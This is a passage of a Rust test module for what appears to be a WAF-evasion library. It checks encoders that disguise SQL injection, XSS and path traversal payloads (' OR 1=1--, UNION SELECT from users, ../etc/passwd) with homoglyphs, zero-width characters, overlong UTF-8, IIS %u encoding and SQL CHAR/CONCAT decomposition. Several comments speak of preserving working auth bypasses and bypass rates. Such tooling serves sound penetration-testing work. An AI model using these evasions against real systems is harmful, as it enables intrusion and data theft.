1585 fn html_entity_variants_xss_payload() {
1586 // '<' = 0x3C = 60, 's'=0x73=115, '>'=0x3E=62
1587 // First three chars use slots 0, 1, 2:
1588 let encoded = html_entity_variants("<s>");
1589 assert_eq!(encoded, "<s>");
1590 }
1591
1592 #[test]
1593 fn html_entity_variants_unicode_codepoint() {
1594 // emoji U+1F600 ('๐') โ codepoint 128512 โ exercises higher-bit chars
1595 let encoded = html_entity_variants("\u{1F600}");
1596 assert_eq!(encoded, "😀");
1597 }
1598
1599 #[test]
1600 fn html_entity_variants_distinct_from_canonical() {
1601 // 4+ char payload MUST differ from canonical html_entity_encode
1602 // (canonical is always lowercase-x hex with semicolon)
1603 let canon = html_entity_encode("ABCD");
1604 let var = html_entity_variants("ABCD");
1605 assert_ne!(canon, var);
1606 }
1607
1608 #[test]
1609 fn html_entity_variants_deterministic() {
1610 // Same input โ same output (no randomness; rotation is by index)
1611 assert_eq!(
1612 html_entity_variants("hello world"),
1613 html_entity_variants("hello world")
1614 );
1615 }
1616
1617 // โโ math_bold_encode tests โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1618
1619 #[test]
1620 fn math_bold_encode_uppercase() {
1621 assert_eq!(math_bold_encode("A"), "\u{1D400}"); // ๐
1622 assert_eq!(math_bold_encode("Z"), "\u{1D419}"); // ๐
1623 }
1624
1625 #[test]
1626 fn math_bold_encode_lowercase() {
1627 assert_eq!(math_bold_encode("a"), "\u{1D41A}"); // ๐
1628 assert_eq!(math_bold_encode("z"), "\u{1D433}"); // ๐ณ
1629 }
1630
1631 #[test]
1632 fn math_bold_encode_digits() {
1633 assert_eq!(math_bold_encode("0"), "\u{1D7CE}"); // ๐
1634 assert_eq!(math_bold_encode("9"), "\u{1D7D7}"); // ๐
1635 }
1636
1637 #[test]
1638 fn math_bold_encode_sql_keyword() {
1639 // SELECT โ ๐๐๐๐๐๐
1640 let encoded = math_bold_encode("SELECT");
1641 assert_eq!(encoded.chars().count(), 6);
1642 for ch in encoded.chars() {
1643 assert!(
1644 (0x1D400..=0x1D419).contains(&(ch as u32)),
1645 "expected math bold capital, got U+{:04X}",
1646 ch as u32
1647 );
1648 }
1649 }
1650
1651 #[test]
1652 fn math_bold_encode_preserves_punctuation() {
1653 // ' OR 1=1-- โ only letters/digits transform; punctuation stays
1654 let encoded = math_bold_encode("' OR 1=1--");
1655 // ' space = = - - all unchanged
1656 assert!(encoded.starts_with('\''));
1657 assert!(encoded.contains('='));
1658 assert!(encoded.ends_with("--"));
1659 }
1660
1661 #[test]
1662 fn math_bold_encode_mixed_alphanumeric() {
1663 let encoded = math_bold_encode("Aa0");
1664 // A โ ๐, a โ ๐, 0 โ ๐
1665 let chars: Vec<char> = encoded.chars().collect();
1666 assert_eq!(chars.len(), 3);
1667 assert_eq!(chars[0] as u32, 0x1D400);
1668 assert_eq!(chars[1] as u32, 0x1D41A);
1669 assert_eq!(chars[2] as u32, 0x1D7CE);
1670 }
1671
1672 #[test]
1673 fn math_bold_encode_distinct_from_fullwidth() {
1674 // Fullwidth uses U+FF00 block; math bold uses U+1D400 block
1675 // The same input must produce different bytes (proving they're not equivalent).
1676 assert_ne!(math_bold_encode("SELECT"), fullwidth_encode("SELECT"));
1677 }
1678
1679 #[test]
1680 fn math_bold_encode_empty() {
1681 assert_eq!(math_bold_encode(""), "");
1682 }
1683
1684 // โโ math_italic / script / fraktur / double_struck tests โโโโโโโโโโโโ
1685
1686 #[test]
1687 fn math_italic_encode_uppercase() {
1688 assert_eq!(math_italic_encode("A"), "\u{1D434}"); // ๐ด
1689 assert_eq!(math_italic_encode("Z"), "\u{1D44D}"); // ๐
1690 }
1691
1692 #[test]
1693 fn math_italic_encode_handles_h_hole() {
1694 // U+1D455 is reserved (the hole); we substitute U+210E.
1695 assert_eq!(math_italic_encode("h"), "\u{210E}");
1696 }
1697
1698 #[test]
1699 fn math_italic_encode_is_distinct_from_bold() {
1700 assert_ne!(math_italic_encode("SELECT"), math_bold_encode("SELECT"));
1701 }
1702
1703 #[test]
1704 fn math_script_encode_fills_all_holes() {
1705 // Every uppercase letter must map to SOMETHING (no panic, no
1706 // fall-through to ASCII).
1707 for c in 'A'..='Z' {
1708 let s: String = c.to_string();
1709 let enc = math_script_encode(&s);
1710 assert!(
1711 enc != s,
1712 "math_script_encode left {c} unchanged โ hole not filled"
1713 );
1714 }
1715 }
1716
1717 #[test]
1718 fn math_fraktur_encode_fills_chizr_holes() {
1719 for c in &['C', 'H', 'I', 'R', 'Z'] {
1720 let s: String = c.to_string();
1721 assert!(
1722 math_fraktur_encode(&s) != s,
1723 "math_fraktur_encode left {c} unchanged"
1724 );
1725 }
1726 }
1727
1728 #[test]
1729 fn math_double_struck_encode_digits_distinct_from_bold() {
1730 // double-struck 0 = U+1D7D8 โ bold 0 = U+1D7CE
1731 assert_ne!(math_double_struck_encode("0"), math_bold_encode("0"));
1732 }
1733
1734 #[test]
1735 fn math_double_struck_encode_fills_letter_holes() {
1736 for c in &['C', 'H', 'N', 'P', 'Q', 'R', 'Z'] {
1737 let s: String = c.to_string();
1738 assert!(math_double_struck_encode(&s) != s);
1739 }
1740 }
1741
1742 #[test]
1743 fn letterlike_encode_select_payload_uses_letterlike_block() {
1744 let encoded = letterlike_encode("SELECT");
1745 // L โ U+2112 SCRIPT CAPITAL L (the headline letterlike sub).
1746 assert!(encoded.contains('\u{2112}'));
1747 // S has no letterlike-block equivalent; falls back to circled
1748 // Latin (U+24CE).
1749 assert!(
1750 encoded
1751 .chars()
1752 .any(|c| c as u32 >= 0x24B6 && c as u32 <= 0x24E9)
1753 );
1754 }
1755
1756 #[test]
1757 fn letterlike_encode_preserves_non_letters() {
1758 assert_eq!(letterlike_encode(" ' = "), " ' = ");
1759 }
1760
1761 #[test]
1762 fn all_new_encoders_preserve_pure_punctuation() {
1763 // Pure punctuation โ no letters, no digits โ must round-trip
1764 // through every encoder unchanged. (Digits ARE transformed
1765 // by math_double_struck_encode, so we exclude them.)
1766 for f in [
1767 math_italic_encode,
1768 math_script_encode,
1769 math_fraktur_encode,
1770 math_double_struck_encode,
1771 letterlike_encode,
1772 ] {
1773 assert_eq!(f("' = -- /* */ ;"), "' = -- /* */ ;");
1774 }
1775 }
1776
1777 #[test]
1778 fn all_new_encoders_distinct_from_each_other() {
1779 let s = "SELECT";
1780 let bold = math_bold_encode(s);
1781 let italic = math_italic_encode(s);
1782 let script = math_script_encode(s);
1783 let fraktur = math_fraktur_encode(s);
1784 let dstruck = math_double_struck_encode(s);
1785 let letter = letterlike_encode(s);
1786 let outputs = [bold, italic, script, fraktur, dstruck, letter];
1787 let set: std::collections::BTreeSet<&String> = outputs.iter().collect();
1788 assert_eq!(
1789 set.len(),
1790 outputs.len(),
1791 "two encoders produced identical output"
1792 );
1793 }
1794
1795 // โโ zero-width + combining-mark injection tests โโโโโโโโโโโโโโโโโโโโ
1796
1797 #[test]
1798 fn zero_width_inject_adds_chars_between_letters() {
1799 let out = zero_width_inject("script", '\u{200B}');
1800 assert!(out.contains("scr\u{200B}ipt") || out.contains("s\u{200B}c"));
1801 // Length grows by N-1 codepoints (one between each pair).
1802 assert_eq!(out.chars().count(), 6 + 5);
1803 }
1804
1805 #[test]
1806 fn zero_width_inject_preserves_non_alnum() {
1807 // Insert only between alnum chars, not punctuation.
1808 let out = zero_width_inject("' OR '1'='1", '\u{200C}');
1809 // The lone `'` chars don't trigger insertion before them.
1810 assert!(!out.starts_with('\u{200C}'));
1811 }
1812
1813 #[test]
1814 fn zero_width_defaults_count_correct() {
1815 // Five-element cycle so rotation covers ZWSP/ZWNJ/ZWJ/BOM/CGJ.
1816 assert_eq!(ZERO_WIDTH_DEFAULTS.len(), 5);
1817 }
1818
1819 #[test]
1820 fn combining_mark_inject_only_after_letters() {
1821 let out = combining_mark_inject("a1b2", '\u{0308}');
1822 // 'a' + ฬ + '1' + 'b' + ฬ + '2' โ digits don't get marks.
1823 assert_eq!(out, "a\u{0308}1b\u{0308}2");
1824 }
1825
1826 // โโ script_homoglyph_encode tests โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1827
1828 #[test]
1829 fn script_homoglyph_select_uses_cyrillic_letters() {
1830 let out = script_homoglyph_encode("SELECT");
1831 // S โ Cyrillic (no Cyrillic S โ falls through to itself OR
1832 // gets mapped to one of the upper substitutions). E โ U+0415.
1833 assert!(out.contains('\u{0415}'));
1834 // T โ U+0422
1835 assert!(out.contains('\u{0422}'));
1836 // Output is byte-distinct from input.
1837 assert_ne!(out, "SELECT");
1838 }
1839
1840 #[test]
1841 fn script_homoglyph_preserves_punctuation() {
1842 assert_eq!(script_homoglyph_encode("' = -- ;"), "' = -- ;");
1843 }
1844
1845 // โโ turkish_i + sharp_s tests โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1846
1847 #[test]
1848 fn turkish_i_encode_replaces_only_i() {
1849 assert_eq!(turkish_i_encode("script"), "scr\u{0131}pt");
1850 assert_eq!(turkish_i_encode("INSERT"), "\u{0130}NSERT");
1851 // 'a', 'b' etc. unchanged.
1852 assert_eq!(turkish_i_encode("abcdefg"), "abcdefg");
1853 }
1854
1855 #[test]
1856 fn sharp_s_encode_replaces_only_s() {
1857 assert_eq!(sharp_s_encode("select"), "\u{00DF}elect");
1858 assert_eq!(sharp_s_encode("SELECT"), "\u{00DF}ELECT");
1859 }
1860
1861 // โโ json_key_unicode_escape tests โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1862
1863 #[test]
1864 fn json_key_escape_full_id_payload() {
1865 let s = json_key_unicode_escape("id", "1 OR 1=1--");
1866 // Each char of "id" becomes \uXXXX.
1867 assert!(s.contains("\\u0069")); // i
1868 assert!(s.contains("\\u0064")); // d
1869 // Value JSON-encoded.
1870 assert!(s.contains("1 OR 1=1--"));
1871 }
1872
1873 #[test]
1874 fn json_key_escape_round_trips_through_serde() {
1875 let s = json_key_unicode_escape("admin", "true");
1876 let parsed: serde_json::Value = serde_json::from_str(&s).expect("valid JSON");
1877 // After parsing, the key decodes back to "admin".
1878 assert!(parsed.get("admin").is_some(), "decoded key missing: {s}");
1879 }
1880
1881 #[test]
1882 fn json_key_escape_preserves_value_quotes() {
1883 let s = json_key_unicode_escape("k", "v\"q");
1884 // serde_json escapes the inner quote.
1885 assert!(s.contains("v\\\"q"));
1886 }
1887
1888 // โโ overlong_utf8_path tests โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1889
1890 #[test]
1891 fn overlong_utf8_2byte_dot_slash_replaces() {
1892 assert_eq!(
1893 overlong_utf8_path("../etc/passwd", 2),
1894 "%c0%ae%c0%ae%c0%afetc%c0%afpasswd"
1895 );
1896 }
1897
1898 #[test]
1899 fn overlong_utf8_3byte_dot_slash() {
1900 let out = overlong_utf8_path("..", 3);
1901 assert_eq!(out, "%e0%80%ae%e0%80%ae");
1902 }
1903
1904 #[test]
1905 fn overlong_utf8_4byte_default() {
1906 let out = overlong_utf8_path(".", 4);
1907 assert_eq!(out, "%f0%80%80%ae");
1908 }
1909
1910 #[test]
1911 fn overlong_utf8_preserves_non_traversal_chars() {
1912 let out = overlong_utf8_path("../etc/passwd", 2);
1913 assert!(out.contains("etc"));
1914 assert!(out.contains("passwd"));
1915 }
1916
1917 #[test]
1918 fn overlong_utf8_handles_backslash() {
1919 assert_eq!(
1920 overlong_utf8_path("..\\windows", 2),
1921 "%c0%ae%c0%ae%c0%5cwindows"
1922 );
1923 }
1924
1925 // โโ bidi_inject tests โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1926
1927 #[test]
1928 fn bidi_inject_wraps_with_rlo_and_pdf() {
1929 let out = bidi_inject("tceleS");
1930 assert!(out.starts_with('\u{202E}'));
1931 assert!(out.ends_with('\u{202C}'));
1932 // 1 RLO + 6 letters + 1 PDF.
1933 assert_eq!(out.chars().count(), 8);
1934 }
1935
1936 // โโ sql_concat_split tests โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1937
1938 #[test]
1939 fn sql_concat_split_admin() {
1940 assert_eq!(sql_concat_split("'admin'"), "CONCAT('a','d','m','i','n')");
1941 }
1942
1943 #[test]
1944 fn sql_concat_split_password() {
1945 assert_eq!(
1946 sql_concat_split("'password'"),
1947 "CONCAT('p','a','s','s','w','o','r','d')"
1948 );
1949 }
1950
1951 #[test]
1952 fn sql_concat_split_in_clause() {
1953 assert_eq!(
1954 sql_concat_split("WHERE u='admin'"),
1955 "WHERE u=CONCAT('a','d','m','i','n')"
1956 );
1957 }
1958
1959 #[test]
1960 fn sql_concat_split_no_quotes_passthrough() {
1961 // No single quotes โ input unchanged
1962 assert_eq!(sql_concat_split("SELECT 1"), "SELECT 1");
1963 }
1964
1965 #[test]
1966 fn sql_concat_split_multiple_literals() {
1967 // Two separate strings get independent CONCAT calls
1968 assert_eq!(sql_concat_split("'a' OR 'b'"), "CONCAT('a') OR CONCAT('b')");
1969 }
1970
1971 #[test]
1972 fn sql_concat_split_empty_literal() {
1973 assert_eq!(sql_concat_split("''"), "CONCAT('')");
1974 }
1975
1976 #[test]
1977 fn sql_concat_split_unbalanced_quote_passthrough() {
1978 // Lone opening quote with no closer โ output preserves it
1979 assert_eq!(sql_concat_split("'unclosed"), "'unclosed");
1980 }
1981
1982 #[test]
1983 fn sql_concat_split_preserves_non_quote_chars() {
1984 // SQL keywords, operators, whitespace all unchanged
1985 let payload = "1=1; SELECT 'x', 'y' FROM dual";
1986 let out = sql_concat_split(payload);
1987 assert!(out.contains("SELECT"));
1988 assert!(out.contains("FROM dual"));
1989 assert!(out.contains("CONCAT('x')"));
1990 assert!(out.contains("CONCAT('y')"));
1991 }
1992
1993 #[test]
1994 fn sql_concat_split_real_injection_payload() {
1995 // Classic UNION SELECT extraction
1996 let payload = "' UNION SELECT 'admin','password' FROM users--";
1997 let out = sql_concat_split(payload);
1998 // Outer ' is unbalanced; collects up to ' before admin then closes there.
1999 // The first CONCAT contains the OR/UNION/SELECT keywords as char args โ
2000 // not a useful execution path, but it demonstrates the tamper is
2001 // applied uniformly. The point is: every single-quoted region becomes
2002 // CONCAT, so a downstream layer can compose this with other tampers.
2003 assert!(out.contains("CONCAT("));
2004 // Real payloads that benefit start the quote OPEN and close it
2005 // before the SQL keywords, e.g. "1' UNION SELECT 'admin'--" where
2006 // the embedded 'admin' is the bypass target.
2007 }
2008
2009 // โโ sql_char_decompose tests โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
2010
2011 #[test]
2012 fn sql_char_decompose_admin() {
2013 // 'a'=97 'd'=100 'm'=109 'i'=105 'n'=110
2014 assert_eq!(sql_char_decompose("'admin'"), "CHAR(97,100,109,105,110)");
2015 }
2016
2017 #[test]
2018 fn sql_char_decompose_password() {
2019 assert_eq!(
2020 sql_char_decompose("'password'"),
2021 "CHAR(112,97,115,115,119,111,114,100)"
2022 );
2023 }
2024
2025 #[test]
2026 fn sql_char_decompose_path_literal() {
2027 // '/etc/passwd' โ every byte represented numerically
2028 // '/'=47 'e'=101 't'=116 'c'=99 '/'=47 'p'=112 'a'=97 's'=115 's'=115 'w'=119 'd'=100
2029 assert_eq!(
2030 sql_char_decompose("'/etc/passwd'"),
2031 "CHAR(47,101,116,99,47,112,97,115,115,119,100)"
2032 );
2033 }
2034
2035 #[test]
2036 fn sql_char_decompose_no_quotes_passthrough() {
2037 assert_eq!(sql_char_decompose("SELECT 1"), "SELECT 1");
2038 }
2039
2040 #[test]
2041 fn sql_char_decompose_empty_literal_preserves_empty_string() {
2042 // F60 regression: pre-fix `''` produced `CHAR()` which is
2043 // NULL in MySQL โ breaking `pass='' OR 1=1` auth bypass
2044 // (`= NULL` is never TRUE). Post-fix the empty literal
2045 // round-trips unchanged.
2046 assert_eq!(sql_char_decompose("''"), "''");
2047 // Embedded in a longer payload too.
2048 assert_eq!(
2049 sql_char_decompose("WHERE pass='' OR 1=1"),
2050 "WHERE pass='' OR 1=1"
2051 );
2052 }
2053
2054 // sql_char_decompose_empty_literal_preserves_empty_string above
2055 // supersedes the pre-fix test that asserted CHAR() โ kept as a
2056 // marker rather than re-asserting the buggy old contract.
2057
2058 #[test]
2059 fn sql_char_decompose_unbalanced_passthrough() {
2060 assert_eq!(sql_char_decompose("'unclosed"), "'unclosed");
2061 }
2062
2063 #[test]
2064 fn sql_char_decompose_multiple_literals() {
2065 // 'a'=97 'b'=98
2066 assert_eq!(sql_char_decompose("'a' OR 'b'"), "CHAR(97) OR CHAR(98)");
2067 }
2068
2069 #[test]
2070 fn sql_char_decompose_distinct_from_concat_split() {
2071 // CONCAT uses single-char strings; CHAR uses ints. Outputs differ.
2072 assert_ne!(sql_char_decompose("'admin'"), sql_concat_split("'admin'"));
2073 }
2074
2075 #[test]
2076 fn sql_char_decompose_real_injection() {
2077 let payload = "1 OR username='admin'--";
2078 let out = sql_char_decompose(payload);
2079 assert_eq!(out, "1 OR username=CHAR(97,100,109,105,110)--");
2080 }
2081
2082 // โโ pg_chr_decompose tests โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
2083
2084 #[test]
2085 fn pg_chr_decompose_admin() {
2086 assert_eq!(
2087 pg_chr_decompose("'admin'"),
2088 "(CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))"
2089 );
2090 }
2091
2092 #[test]
2093 fn pg_chr_decompose_empty_literal() {
2094 assert_eq!(pg_chr_decompose("''"), "('')");
2095 }
2096
2097 #[test]
2098 fn pg_chr_decompose_in_where_clause() {
2099 assert_eq!(pg_chr_decompose("WHERE u='a'"), "WHERE u=(CHR(97))");
2100 }
2101
2102 #[test]
2103 fn pg_chr_decompose_distinct_from_char_decompose() {
2104 // CHR() is unary + pipe-concat; CHAR() is variadic. Different shapes.
2105 assert_ne!(pg_chr_decompose("'admin'"), sql_char_decompose("'admin'"));
2106 }
2107
2108 #[test]
2109 fn pg_chr_decompose_unbalanced_passthrough() {
2110 assert_eq!(pg_chr_decompose("'unclosed"), "'unclosed");
2111 }
2112
2113 #[test]
2114 fn sql_concat_split_isolated_literal_keeps_other_tokens() {
2115 // From a real payload: id=1 AND username = 'admin' AND status = 1
2116 let payload = "id=1 AND username='admin' AND status=1";
2117 let out = sql_concat_split(payload);
2118 assert_eq!(
2119 out,
2120 "id=1 AND username=CONCAT('a','d','m','i','n') AND status=1"
2121 );
2122 }
2123
2124 #[test]
2125 fn unicode_encode_empty() {
2126 assert_eq!(unicode_encode(""), "");
2127 }
2128
2129 // โโ Fullwidth encoding tests โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
2130
2131 #[test]
2132 fn fullwidth_encode_sql_keywords() {
2133 let encoded = fullwidth_encode("SELECT");
2134 assert_eq!(encoded, "๏ผณ๏ผฅ๏ผฌ๏ผฅ๏ผฃ๏ผด");
2135 // Every ASCII letter should be in fullwidth range
2136 for ch in encoded.chars() {
2137 assert!(
2138 ch as u32 >= 0xFF01,
2139 "expected fullwidth char, got {ch} (U+{:04X})",
2140 ch as u32
2141 );
2142 }
2143 }
2144
2145 #[test]
2146 fn fullwidth_encode_spaces() {
2147 let encoded = fullwidth_encode("A B");
2148 assert!(
2149 encoded.contains('\u{3000}'),
2150 "space should become ideographic space"
2151 );
2152 }
2153
2154 #[test]
2155 fn fullwidth_encode_preserves_non_ascii() {
2156 let encoded = fullwidth_encode("ๆฅๆฌ่ช");
2157 assert_eq!(encoded, "ๆฅๆฌ่ช", "non-ASCII should pass through unchanged");
2158 }
2159
2160 #[test]
2161 fn fullwidth_encode_operators() {
2162 let encoded = fullwidth_encode("1=1");
2163 assert_eq!(encoded, "๏ผ๏ผ๏ผ");
2164 }
2165
2166 #[test]
2167 fn fullwidth_encode_sqli_payload() {
2168 let encoded = fullwidth_encode("' OR 1=1--");
2169 // Should contain fullwidth equivalents, not ASCII
2170 assert!(!encoded.contains("OR"), "should not contain ASCII 'OR'");
2171 assert!(encoded.contains("๏ผฏ๏ผฒ"), "should contain fullwidth '๏ผฏ๏ผฒ'");
2172 }
2173
2174 #[test]
2175 fn fullwidth_encode_empty() {
2176 assert_eq!(fullwidth_encode(""), "");
2177 }
2178
2179 // โโ Homoglyph encoding tests โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
2180
2181 #[test]
2182 fn homoglyph_preserves_sql_string_delimiters() {
2183 // Regression for F56: pre-fix `'` was mapped to U+2019,
2184 // destroying the SQL context-break the payload depends on.
2185 // U+2019 is not a SQL string delimiter โ the host query's
2186 // string literal never closes and the injection becomes
2187 // inert. Verify the delimiters survive verbatim.
2188 let encoded = homoglyph_encode("' OR '1'='1");
2189 // Single + double quotes pass through unchanged.
2190 assert!(
2191 encoded.contains('\''),
2192 "ASCII single quote MUST be preserved for SQL: {encoded}"
2193 );
2194 assert!(
2195 !encoded.contains('\u{2019}'),
2196 "U+2019 right-single-quote must NOT appear: {encoded}"
2197 );
2198 // But the equals sign (non-delimiter) still gets mutated โ
2199 // proves the function isn't a complete no-op.
2200 assert!(
2201 encoded.contains('\u{FF1D}'),
2202 "equals sign should still mutate to fullwidth: {encoded}"
2203 );
2204 }
2205
2206 #[test]
2207 fn homoglyph_preserves_ascii_double_quote() {
2208 let encoded = homoglyph_encode(r#""admin" OR "1"="1""#);
2209 assert!(
2210 encoded.contains('"'),
2211 "ASCII double quote MUST be preserved: {encoded}"
2212 );
2213 assert!(
2214 !encoded.contains('\u{201D}'),
2215 "U+201D right-double-quote must NOT appear: {encoded}"
2216 );
2217 }
2218
2219 #[test]
2220 fn homoglyph_replaces_angle_brackets() {
2221 let encoded = homoglyph_encode("<script>");
2222 assert!(!encoded.contains('<'), "ASCII < should be replaced");
2223 assert!(!encoded.contains('>'), "ASCII > should be replaced");
2224 assert!(encoded.contains('\u{FF1C}'), "should contain fullwidth <");
2225 assert!(encoded.contains('\u{FF1E}'), "should contain fullwidth >");
2226 }
2227
2228 #[test]
2229 fn homoglyph_replaces_equals() {
2230 let encoded = homoglyph_encode("1=1");
2231 assert!(!encoded.contains('='), "ASCII = should be replaced");
2232 assert!(encoded.contains('\u{FF1D}'), "should contain fullwidth =");
2233 }
2234
2235 #[test]
2236 fn homoglyph_preserves_letters() {
2237 let encoded = homoglyph_encode("SELECT");
2238 assert_eq!(encoded, "SELECT", "letters should be preserved");
2239 }
2240
2241 #[test]
2242 fn homoglyph_encode_empty() {
2243 assert_eq!(homoglyph_encode(""), "");
2244 }
2245
2246 #[test]
2247 fn homoglyph_replaces_parens() {
2248 let encoded = homoglyph_encode("fn()");
2249 assert!(encoded.contains('\u{FF08}'), "should contain fullwidth (");
2250 assert!(encoded.contains('\u{FF09}'), "should contain fullwidth )");
2251 }
2252
2253 // โโ Bug 2 regression: iis_unicode_encode non-BMP adversarial twins โโ
2254 //
2255 // PRE-FIX BUG: the loop body cast `ch as u32` into a %uXXXX format
2256 // without checking whether `code > 0xFFFF`. For supplementary-plane
2257 // characters (U+10000 and above) this produced a 5-digit hex sequence
2258 // like `%u1F600`, which IIS's %u decoder rejects (its format is
2259 // strictly 4 hex digits). The bypass looked encoded but was actually
2260 // undecodable on any real IIS target โ a silent bypass-rate killer.
2261 // Fixed: emit a UTF-16 surrogate pair `%uHIGH%uLOW` for non-BMP chars.
2262
2263 #[test]
2264 fn iis_unicode_encode_lowest_non_bmp_u10000() {
2265 // U+10000 is the very first supplementary-plane codepoint (LINEAR B
2266 // SYLLABLE B008 A). Pre-fix: emitted `%u10000` (5 hex digits โ
2267 // invalid IIS format). Post-fix: must emit the surrogate pair
2268 // %uD800%uDC00 (high=0xD800, low=0xDC00 for U+10000).
2269 let ch = '\u{10000}'; // U+10000
2270 let encoded = iis_unicode_encode(&ch.to_string());
2271 assert_eq!(
2272 encoded, "%uD800%uDC00",
2273 "U+10000 (lowest non-BMP) must encode as surrogate pair %uD800%uDC00, \
2274 not the invalid %u10000"
2275 );
2276 // Anti-regression: no 5-digit %u sequence.
2277 for hex_run in encoded.split("%u").skip(1) {
2278 let hex_part: String = hex_run
2279 .chars()
2280 .take_while(|c| c.is_ascii_hexdigit())
2281 .collect();
2282 assert_eq!(
2283 hex_part.len(),
2284 4,
2285 "every %u sequence must be exactly 4 hex digits (IIS spec); \
2286 got {hex_part:?} in {encoded:?}"
2287 );
2288 }
2289 }
2290
2291 #[test]
2292 fn iis_unicode_encode_high_cjk_supplement_u20000() {
2293 // U+20000 is the first codepoint in CJK Unified Ideographs Extension
2294 // B (๐ ). Pre-fix: emitted `%u20000` (5 hex digits โ IIS rejects).
2295 // Post-fix: surrogate pair calculation:
2296 // surrogate_base = 0x20000 - 0x10000 = 0x10000
2297 // high = 0xD800 + (0x10000 >> 10) = 0xD800 + 0x40 = 0xD840
2298 // low = 0xDC00 + (0x10000 & 0x3FF) = 0xDC00 + 0x00 = 0xDC00
2299 let ch = '\u{20000}';
2300 let encoded = iis_unicode_encode(&ch.to_string());
2301 assert_eq!(
2302 encoded, "%uD840%uDC00",
2303 "U+20000 (CJK Supplement) must encode as %uD840%uDC00"
2304 );
2305 for hex_run in encoded.split("%u").skip(1) {
2306 let hex_part: String = hex_run
2307 .chars()
2308 .take_while(|c| c.is_ascii_hexdigit())
2309 .collect();
2310 assert_eq!(
2311 hex_part.len(),
2312 4,
2313 "each %u group must be 4 hex digits; got {hex_part:?}"
2314 );
2315 }
2316 }
2317
2318 // โโ ยง1 SPEED regression pins: byte-slice lookahead in json_unicode_alnum
2319 // and json_unicode_full (replacing Vec<char> collect). These tests pin
2320 // the observable contract so a revert to Vec<char> (or a bad rewrite
2321 // that breaks the ASCII-byte-boundary assumption) is caught immediately.
2322
2323 #[test]
2324 fn json_unicode_alnum_idempotency_multi_pre_escaped() {
2325 // A payload with TWO pre-escaped sequences back-to-back. The
2326 // byte-slice lookahead must advance the iterator correctly for
2327 // each and not double-count the second `\u`.
2328 let p = "\\u0041\\u0042"; // Already-escaped A, B
2329 let once = json_unicode_alnum(p);
2330 let twice = json_unicode_alnum(&once);
2331 // Both passes: no change โ the sequences are already `\uXXXX`.
2332 assert_eq!(once, p, "first pass on pre-escaped must be a no-op");
2333 assert_eq!(twice, p, "second pass must also be a no-op");
2334 }
2335
2336 #[test]
2337 fn json_unicode_alnum_incomplete_escape_not_skipped() {
2338 // `\u004` (5 chars total but only 3 hex digits after `u`) must NOT
2339 // be treated as a pre-escaped sequence โ the 4th hex digit is absent.
2340 // The `\` gets escaped (it's not alnum), `u` and `0`, `0`, `4` are
2341 // alnum and each get their own `\uXXXX`. This confirms the lookahead
2342 // correctly requires exactly 4 hex digits.
2343 let out = json_unicode_alnum("\\u004");
2344 // `\` โ not alnum โ bare `\`; `u`,`0`,`0`,`4` โ each `\uXXXX`.
2345 // Net: the string is NOT passed through as-is.
2346 assert_ne!(out, "\\u004", "incomplete escape must not be skipped");
2347 }
2348
2349 #[test]
2350 fn json_unicode_full_idempotency_multi_pre_escaped() {
2351 // Same as alnum variant but for json_unicode_full.
2352 let p = "\\u0041\\u0042";
2353 let once = json_unicode_full(p);
2354 let twice = json_unicode_full(&once);
2355 assert_eq!(once, p, "first pass: pre-escaped must survive");
2356 assert_eq!(twice, p, "second pass: still a no-op");
2357 }
2358
2359 #[test]
2360 fn json_unicode_full_escapes_non_alnum_too() {
2361 // json_unicode_full escapes EVERY char โ verify a space (U+0020)
2362 // and apostrophe (U+0027) are escaped, unlike json_unicode_alnum
2363 // which leaves punctuation bare.
2364 let out = json_unicode_full("' '");
2365 assert!(out.contains("\\u0027"), "apostrophe must be escaped");
2366 assert!(out.contains("\\u0020"), "space must be escaped");
2367 }
2368
2369 #[test]
2370 fn overlong_utf8_path_speed_opt_preserves_passthrough_chars() {
2371 // ยง1 SPEED: the push-loop rewrite must leave non-special chars
2372 // unchanged. Mix of alphabetic, digit, and special chars.
2373 let out = overlong_utf8_path("admin/../secret.txt", 2);
2374 assert!(out.contains("admin"));
2375 assert!(out.contains("secret"));
2376 assert!(out.contains("txt"));
2377 assert!(!out.contains('.')); // dots replaced
2378 assert!(!out.contains('/')); // slashes replaced
2379 }
2380
2381 #[test]
2382 fn overlong_utf8_path_empty_input_empty_output() {
2383 assert_eq!(overlong_utf8_path("", 2), "");
2384 }
2385}